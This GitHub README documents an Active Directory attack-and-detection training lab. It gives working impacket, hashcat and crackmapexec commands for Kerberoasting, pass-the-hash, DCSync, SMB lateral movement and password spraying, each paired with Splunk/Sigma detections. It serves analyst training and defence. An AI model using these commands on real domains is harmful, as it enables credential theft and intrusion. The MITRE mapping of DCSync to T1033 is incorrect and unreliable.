GitHub: Shivam-kumar-jha/ad-exploitation-lab
# Active Directory Exploitation Lab
## Overview
## Lab Architecture
```text
┌─────────────────────────┐
│ Attacker (Kali)         │
│ • Nmap, Metasploit      │
│ • Impacket tools        │
└──────────┬──────────────┘
           │ Network attack
           ↓
┌─────────────────────────┐
│ Windows Domain          │
│ • DC (Active Directory) │
│ • Member Server         │
│ • Workstations          │
└──────────┬──────────────┘
           │ Event logs
           ↓
┌─────────────────────────┐
│ Splunk SIEM             │
│ • Ingests Windows logs  │
│ • Runs Sigma rules      │
│ • Real-time alerts      │
└─────────────────────────┘
```
## Attacks Documented
| # | Attack | T-Code | Files | Detection |
|---|--------|--------|-------|-----------|
| 1 | Kerberoasting | T1558.003 | [attacks/01-kerberoasting](attacks/01-kerberoasting) | [Sigma](detections/01-kerberoasting.yml) |
| 2 | Pass-the-Hash | T1550.002 | [attacks/02-pth](attacks/02-pth) | [Sigma](detections/02-pth.yml) |
| 3 | DCSync | T1033 | [attacks/03-dcsync](attacks/03-dcsync) | [Sigma](detections/03-dcsync.yml) |
| 4 | Lateral Movement (SMB) | T1021.002 | [attacks/04-lateral](attacks/04-lateral) | [Sigma](detections/04-lateral.yml) |
| 5 | Credential Harvesting | T1110.003 | [attacks/05-creds](attacks/05-creds) | [Sigma](detections/05-creds.yml) |
## Getting Started
### Prerequisites
- VMware/Hyper-V with ≥12GB RAM
- Windows Server 2019 ISO (with AD DS role)
- Kali Linux 2024.x
- Splunk Enterprise (free license)
### Setup (~55 minutes)
1. Import the domain controller VM
2. Create the test domain: attacklab.local
3. Add 3 user accounts with varied permissions
4. Install Splunk on a separate VM
5. Configure WEF (Windows Event Forwarding) to Splunk
See [docs/SETUP.md](docs/SETUP.md) for the full guide.
## Attack Walkthroughs
### 1. Kerberoasting (T1558.003)
**Objective:** Request TGS tickets for domain services and crack them offline.
**Tools:** impacket-GetUserSPNs, hashcat
```bash
# Request TGS tickets for all user accounts with an SPN
python3 /usr/share/impacket/examples/GetUserSPNs.py -request \
  attacklab.local/lowuser:password@dc.attacklab.local
# Crack the TGS-REP hashes offline (mode 13100 = Kerberos 5 TGS-REP etype 23)
hashcat -m 13100 kerberoast.txt wordlist.txt
```
**Detection:** Splunk query identifies unusual SPN requests from non-service accounts. Sigma rule triggers on Event 4769 + 4768 correlation.
**Evidence:** PCAP, log extracts, and Splunk alert screenshot in `evidence/`.
### 2. Pass-the-Hash (T1550.002)
**Objective:** Reuse NTLM hash without cracking to move laterally.
**Tools:** impacket-psexec, mimikatz
```bash
# Extract NTLM hashes from exported SAM/SECURITY/SYSTEM hives
impacket-secretsdump -sam SAM -security SECURITY -system SYSTEM LOCAL
# Pass the hash (LM:NT format; no plaintext password required)
impacket-psexec -hashes aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c \
  administrator@member.attacklab.local cmd.exe
```
**Detection:** Logon type 3 from unexpected sources; same hash reused across multiple machines.
### 3. DCSync (T1033)
**Objective:** Impersonate a domain controller to extract all password hashes.
**Tools:** impacket-secretsdump (DCSync mode), mimikatz
```bash
# Pull hashes via directory replication (DCSync) using a compromised account
impacket-secretsdump -dc-ip dc.attacklab.local \
  attacklab.local/compromised_user:password@dc.attacklab.local
```
**Detection:** Replication RPC calls from non-DC source; Event 4662 (Replication rights checked) + 4929 (Replication successful).
### 4. Lateral Movement via SMB (T1021.002)
**Objective:** Move from compromised host to domain member using credentials.
**Tools:** impacket-smbclient, impacket-psexec
# Enumerate SMB shares
```bash
# Enumerate SMB shares. impacket-smbclient takes the domain/user:password@host target
# used elsewhere in this README (no -U flag); at its prompt, "shares" lists shares
# and "use C$" opens one.
impacket-smbclient 'attacklab.local/compromised_user:password@member.attacklab.local'
# PSExec-style lateral movement (same target syntax; impacket has no -U/-P flags)
impacket-psexec 'attacklab.local/compromised_user:password@member.attacklab.local' cmd.exe
```
**Detection:** SMB admin$ access from non-admin source; unexpected cmd.exe spawned from svchost.
### 5. Credential Harvesting (T1110.003)
**Objective:** Brute-force or spray weak domain credentials.
**Tools:** crackmapexec
```bash
# Password spray (avoid lockout — one attempt per user)
crackmapexec smb member.attacklab.local -u users.txt -p 'P@ssw0rd123' \
  --continue-on-success --loglevel DEBUG
```
**Detection:** Multiple 4625 (failed logon) events from one source; threshold >5 in 5 minutes.
## Detections Summary
| Attack | Alert Type | Threshold | Response |
|--------|-----------|-----------|----------|
| Kerberoasting | SPN request anomaly | 3+ SPNs/hour | Investigate account |
| Pass-the-Hash | Hash reuse pattern | Same hash, 2+ machines | Kill sessions, reset password |
| DCSync | Replication RPC from non-DC | Any occurrence | Block account, force password change |
| Lateral Movement | Admin$ + cmd.exe process | Any + cmd.exe | Isolate host, terminate process |
| Credential Spray | Failed logons | >5 in 5 min | Enforce MFA, implement lockout |
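As an added example (not code from this repository), the following Python evaluates two of the table's thresholds, the Kerberoasting SPN-count rule (3+ SPNs per account per hour) and the credential-spray rule (>5 failed logons from one source in 5 minutes), over constructed event records. The field names, the ISO timestamps and the exclusion of machine accounts are assumptions about how the Splunk-ingested Security events would look.

```python
"""Lab detection thresholds over constructed Windows Security events (added example, not the repo's code)."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events: a Kerberoasting burst by lowuser, one benign TGS request by alice,
# a six-user spray from 10.0.0.50 in 25 seconds, and two typo-style failures from 10.0.0.7.
SAMPLE_EVENTS = (
    [{"EventID": 4769, "time": f"2024-05-01T10:00:0{i}", "TargetUserName": "lowuser@ATTACKLAB.LOCAL",
      "ServiceName": svc} for i, svc in enumerate(["svc_sql", "svc_web", "svc_backup"])]
    + [{"EventID": 4769, "time": "2024-05-01T11:30:00", "TargetUserName": "alice@ATTACKLAB.LOCAL",
        "ServiceName": "svc_sql"}]
    + [{"EventID": 4625, "time": f"2024-05-01T12:00:{10 + 5 * i}", "IpAddress": "10.0.0.50",
        "TargetUserName": f"user{i}"} for i in range(6)]
    + [{"EventID": 4625, "time": f"2024-05-01T12:03:{s}", "IpAddress": "10.0.0.7",
        "TargetUserName": "bob"} for s in ("00", "30")]
)


def kerberoast_alerts(events, min_spns=3, window=timedelta(hours=1)):
    """Accounts that requested >= min_spns distinct service tickets (4769) within one window."""
    by_user = defaultdict(list)
    for e in events:  # machine accounts ($) are skipped: an assumption of this example
        if e["EventID"] == 4769 and not e["TargetUserName"].split("@")[0].endswith("$"):
            by_user[e["TargetUserName"]].append((datetime.fromisoformat(e["time"]), e["ServiceName"]))
    alerts = set()
    for user, reqs in by_user.items():
        reqs.sort()
        for i, (t0, _) in enumerate(reqs):  # sliding window anchored at each request
            if len({svc for t, svc in reqs[i:] if t - t0 <= window}) >= min_spns:
                alerts.add(user)
                break
    return alerts


def spray_alerts(events, max_failures=5, window=timedelta(minutes=5)):
    """Source addresses with more than max_failures failed logons (4625) inside one window."""
    by_src = defaultdict(list)
    for e in events:
        if e["EventID"] == 4625:
            by_src[e["IpAddress"]].append(datetime.fromisoformat(e["time"]))
    alerts = set()
    for src, times in by_src.items():
        times.sort()
        start = 0
        for end, t in enumerate(times):  # two-pointer window over sorted timestamps
            while t - times[start] > window:
                start += 1
            if end - start + 1 > max_failures:
                alerts.add(src)
                break
    return alerts
```

With the defaults, only `lowuser@ATTACKLAB.LOCAL` and `10.0.0.50` fire; lowering the thresholds shows how quickly the benign alice and bob records become false positives.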
## SOC Analyst Use Case
This lab trains analysts to:
1. Recognize attack patterns in Windows Event logs
2. Correlate events across multiple log sources
3. Distinguish false positives from real attacks
4. Escalate with evidence (PCAP + logs + screenshots)
**Training scenario:** Alert fires on "4769 + 4768 correlation for user_X." Analyst checks: did user_X request TGS tickets for services they don't own? If yes — escalate to incident response.
## File Structure
## Key Takeaways
- Real attack chains — not isolated techniques
- MITRE ATT&CK mapping for every phase
- Sigma detection rule for every attack
- Purple team perspective: offense + defense together
## MITRE ATT&CK Coverage
- T1558.003 — Kerberoasting
- T1550.002 — Pass-the-Hash
- T1033 — DCSync context
- T1021.002 — Lateral Movement (SMB)
- T1110.003 — Brute Force / Credential Spray
**Coverage: 5 unique T-codes across 3 tactics (Credential Access, Lateral Movement, Reconnaissance)**
## How to Talk About This in Interviews
**Status:** Research-grade lab, ready for interviews and internship discussion.